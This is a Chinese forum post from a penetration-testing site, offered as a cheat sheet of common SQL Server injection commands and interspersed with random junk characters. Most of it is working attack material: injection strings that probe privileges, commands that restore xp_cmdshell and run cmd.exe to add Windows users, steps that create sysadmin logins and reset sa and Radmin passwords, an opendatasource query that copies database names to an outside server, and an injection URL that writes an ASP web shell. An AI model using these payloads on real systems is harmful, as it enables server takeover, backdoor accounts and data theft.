中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的7 ~2 D" @. y# @1 C* n7 d; I) ~
and 1=(Select IS_MEMBER('db_owner'))6 I$ l/ A4 T; m+ o7 @( V" u
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 l! J& \. }* H+ |' U& w
6 X- \! [. o$ K6 N) x: ]# }4 ]//检测是否有读取某数据库的权限4 [% B3 b! b$ L' f& b) {! ~
and 1= (Select HAS_DBACCESS('master'))
" g+ _, s8 N8 Q1 M, a) ?And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
$ e* Y6 F: b& n) I" Z( Z% P6 T1 Z% n5 x: X0 o

1 J8 ^3 e  r/ K! G) R3 [数字类型
) w) }& O# `  [3 O' }! }) n- xand char(124)%2Buser%2Bchar(124)=0+ T2 n, D/ |& ]% k9 o& `
3 u% u' V' M) p: U0 T
字符类型* p) W6 q' x$ e; S* b$ Y+ k
' and char(124)%2Buser%2Bchar(124)=0 and ''='' P* _, c1 q+ [+ @

" g. {6 e# o; p* w搜索类型
3 e- K, `; `" E- q1 z  o' and char(124)%2Buser%2Bchar(124)=0 and '%'='4 V" T' @& {6 Q- I; J
; Z; {4 q6 ~" U. W+ l1 @) ]
爆用户名+ w* G& B. B) }- X
and user>0
+ ~8 F. m( S; ?) N- c  }' and user>0 and ''='
9 K! y4 m: a& l# l9 G& d) S( C2 i8 l6 Y5 {
检测是否为SA权限3 i7 Q5 M4 \# |! r# c: p* L, ?9 H
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--: C7 K) k; k+ A& N. q% _
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --' i# V7 d- O' p8 O1 o; R, b  m; B

3 b- H; `) ]1 b* A* n# W/ H$ c检测是不是MSSQL数据库7 H. u: g8 o$ @% Q5 F2 k' y
and exists (select * from sysobjects);--
( G+ S% F4 I! [# y+ Z+ y. n( i: [% d
0 \2 ^8 V; `4 |4 R; M$ M检测是否支持多行. _0 e4 u6 @9 y
;declare @d int;--- l$ p# w% M/ B7 x& J6 c
# Q. m! P0 c' X  G) N' ?
恢复 xp_cmdshell
2 E7 P5 A  r+ n* m2 R;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--( r# U$ q, B5 K2 n# I+ h8 Z

, g8 S, g/ B) Z+ J3 X- C7 V4 ^6 }9 ~, r
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
( o, I% R! Q7 L, s; L
% S( Q( i1 |  j. z/ e& P, U//-----------------------3 o3 ~+ G  O, Z- T; x6 L
//       执行命令
+ q$ @9 r, m3 w//-----------------------8 q, Q0 P8 ~5 c$ M4 W' Y
首先开启沙盘模式:) e9 {3 T+ s: r+ H" q- W3 f+ O2 f
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
; E/ I3 ]" r/ J- e
1 a, u+ _8 O6 t: ]# ?$ L1 N2 Z$ a然后利用jet.oledb执行系统命令8 O  K2 A5 }6 Q# u- f1 K7 S
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')) d2 G2 ^" a& L

( C$ d( x0 ~% P* B执行命令
8 K) s* _" D) e# O3 `- ?;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
1 K+ ~- Q1 b. E2 N. m; g% s0 q* V& G7 J: {3 U
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
% X4 G$ x; {3 U2 n/ o2 M% O
% b" [9 j+ r; ]$ v$ D( p+ @# ]6 }判断xp_cmdshell扩展存储过程是否存在:
9 f1 e' x7 y/ M& a7 \8 Uhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
' R8 E0 m- i7 A- e( |
5 g& U1 l8 F. U$ \- i# d写注册表
7 ^9 I# H+ v+ v0 f2 j+ Y# b- M$ Aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 U8 Y. G5 l4 j! _* U

' e" t  S, }. tREG_SZ
* O4 b( R8 L7 q! m& h- x
2 S, Z' p: b  p' k: Y读注册表
, O9 g3 T1 G% t6 I) L$ c- U9 Vexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'  h9 ~( e8 i+ a/ @0 U

% x/ j; X; N+ a! g( H读取目录内容
& y8 W( i0 M8 `) y5 texec master..xp_dirtree 'c:\winnt\system32\',1,1' I6 C% y! h( j1 [
, n2 X- y) F) z5 r* I
+ _: K% ]# E: d2 r5 i# @8 t8 U
数据库备份, y, Q) M6 N3 D' P4 X
backup database pubs to disk = 'c:\123.bak'6 Q8 |1 U- H- b& t" }

0 `) v, ^, g1 [//爆出长度: r! o9 N6 j+ \  G* x
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& j. a6 K2 n! Q8 {) t
$ F5 D" ~) \& |
& E2 v% b/ Z' B2 M9 y$ X0 g
6 ^( }: L: P7 j4 V更改sa口令方法:用sql综合利用工具连接后,执行命令:! w# Q0 r0 G+ _) E& ?& |+ }' n2 w
exec sp_password NULL,'新密码','sa'
8 i9 Q3 e: t' ^- R: R8 u6 J" O9 H  D5 \) _2 K0 T. F
添加和删除一个SA权限的用户test:- B& T$ e9 {% I1 N9 }8 @7 X
exec master.dbo.sp_addlogin test,9530772
% N- C# ]5 _% i- W6 x. e3 gexec master.dbo.sp_addsrvrolemember test,sysadmin' K! s5 [) U" n3 ?0 a

$ n! x; b. p) M5 Y# _删除扩展存储过过程xp_cmdshell的语句:9 ]: h* S& W5 e: N
exec sp_dropextendedproc 'xp_cmdshell'' `: {) o) n% U: {

! L; n- Y: G6 ], H7 D6 H# q  H6 E添加扩展存储过过程
& h8 P# ]) D& q1 v; `. k. LEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
0 K/ u: D5 Z! l' q8 V+ k; ^GRANT exec On xp_proxiedadata TO public' N- }7 T6 \" D# {! v8 l$ J

4 p1 |+ E/ p* Q/ F- ]
) e' e9 x4 t- t. V6 I0 Q% P' d7 u停掉或激活某个服务。
( V. r8 J  P% T! R5 \
  X- R, r( S0 M8 E6 v# r# kexec master..xp_servicecontrol 'stop','schedule'& t6 x- y0 ?) e- v6 X
exec master..xp_servicecontrol 'start','schedule'
7 i) K0 p" O& N
) H& Z6 g  K- d+ W. @( Cdbo.xp_subdirs" i) e: H+ |& X' m
; y* ~5 Q1 _8 v) M$ |
只列某个目录下的子目录。
4 T) f/ g" d7 N6 }$ |xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'- D# b1 F) o* Y/ D* G! g! c( z
7 @* s, f# p1 H* S) ?0 r
dbo.xp_makecab
, U4 K& f: z8 [! ?& L6 Q- n/ @( x- }2 q/ b$ `! a
将目标多个档案压缩到某个目标档案之内。
& D/ U% t3 S& u7 p8 l- r9 ]+ {' L所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。2 ^" j5 F' R- s

6 V- y( [4 t; odbo.xp_makecab
, A0 e, i5 ^( j8 d5 h'c:\test.cab','mszip',1,# T# b$ C+ A0 X# Y" X
'C:\Inetpub\wwwroot\SQLInject\login.asp',9 H1 b/ D, c% s! {  Y) ~! e
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
4 y* Z( D1 w4 S( ~, C$ `' ~: H* a5 E/ L  {/ G/ f
xp_terminate_process
8 K1 C5 V5 N% k( \; `; s- w) I8 S% G$ m* o* o3 z/ V; D1 ~4 |1 J; K1 T
停掉某个执行中的程序,但赋予的参数是 Process ID。
1 O) z2 |+ C; Y# h& ~+ h利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID% X) }0 W) z8 L0 k. f
" J' N. R5 I$ @4 m& n
xp_terminate_process 2484
: e7 S& s6 r% ~
/ o) n1 {- R, H. {8 e: vxp_unpackcab
/ \0 E* t, J, i
, ]! n) s* q9 V* d解开压缩档。" a# D4 u  w! _* _, N

4 P9 Z0 ?6 P) f+ C9 yxp_unpackcab 'c:\test.cab','c:\temp',1. ?+ Q9 Y* {: }2 w# F- |

3 o1 c) Y. p% t; J. |- B; O0 D# |9 t9 m8 r/ p- v
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
( l% y; \& `% w) S- f: {% x( Y9 E# S! j, P$ F% N( \) J' b
create database lcx;
" n% N( ^1 j0 s  L5 G+ M7 N0 i# @4 ~Create TABLE ku(name nvarchar(256) null);
4 W3 P3 e% G( M) q' \Create TABLE biao(id int NULL,name nvarchar(256) null);
) L" |! _6 |% B# r* K
; v" o8 r8 p& L5 _8 }//得到数据库名
3 |5 g  c3 \' b) m+ [- p  n. Cinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases5 [7 w; d  w! B2 B) J

( i+ m- s) _+ b7 L7 _) d; Q
4 ?0 f3 f5 G6 S//在Master中创建表,看看权限怎样
5 x) o. B8 o0 B7 k! n3 JCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
3 I% F0 x: ^5 ~. O# Q2 ?7 Q5 O6 [3 i" v
用 sp_makewebtask直接在web目录里写入一句话马:: Q# z3 R$ U& }9 K' l3 K
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--, A' M! k1 q3 B/ m" m0 ~

8 J, d' z! l1 [6 }//更新表内容
! }( y9 y% C) Y( N8 BUpdate films SET kind = 'Dramatic' Where id = 123
2 G/ G+ e3 N/ x3 o2 P. g% M0 t1 L1 S/ b" g
//删除内容2 @; J& [0 r4 _& t) w' L& u
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2